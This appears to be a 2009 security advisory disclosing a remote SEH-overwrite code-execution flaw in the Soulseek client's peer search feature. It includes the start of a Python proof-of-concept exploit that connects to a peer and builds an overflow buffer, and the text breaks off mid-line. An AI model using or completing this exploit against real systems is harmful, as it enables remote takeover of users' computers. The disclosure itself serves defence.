Soulseek 157 NS < 13e & 156.* Remote Peer Search Code Execution ============================================= - Release date: July 02, 2009 - Discovered by: Laurent Gaffié ; http://g-laurent.blogspot.com/ - Severity: critical ============================================= I. VULNERABILITY ------------------------- Soulseek 157 NS < 13e & 156.* Remote Peer Search Code Execution II. BACKGROUND ------------------------- "Soulseek(tm) is a unique ad-free, spyware free, and just plain free file sharing application. One of the things that makes Soulseek(tm) unique is our community and community-related features. Based on peer-to-peer technology, virtual rooms allow you to meet people with the same interests, share information, and chat freely using real-time messages in public or private. Soulseek(tm), with its built-in people matching system, is a great way to make new friends and expand your mind!" III. DESCRIPTION ------------------------- Soulseek client allows direct peer file search, allowing a user to find the files he wants directly on the peer computer. Unfortunatly this feature is vulnerable to a remote SEH overwrite. IV. PROOF OF CONCEPT ------------------------- This proof of concept will target a user called 123yow123. import struct import sys, socket from time import * ip = "IP_ADDR" port = "PORT_NUM" #You can find out, how to find out IP/PORT if you RTFM :) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((ip,port)) except: print "Can\'t connect to peer!\n" sys.exit(0) junk = "\x41" * 3084 next_seh = struct.pack('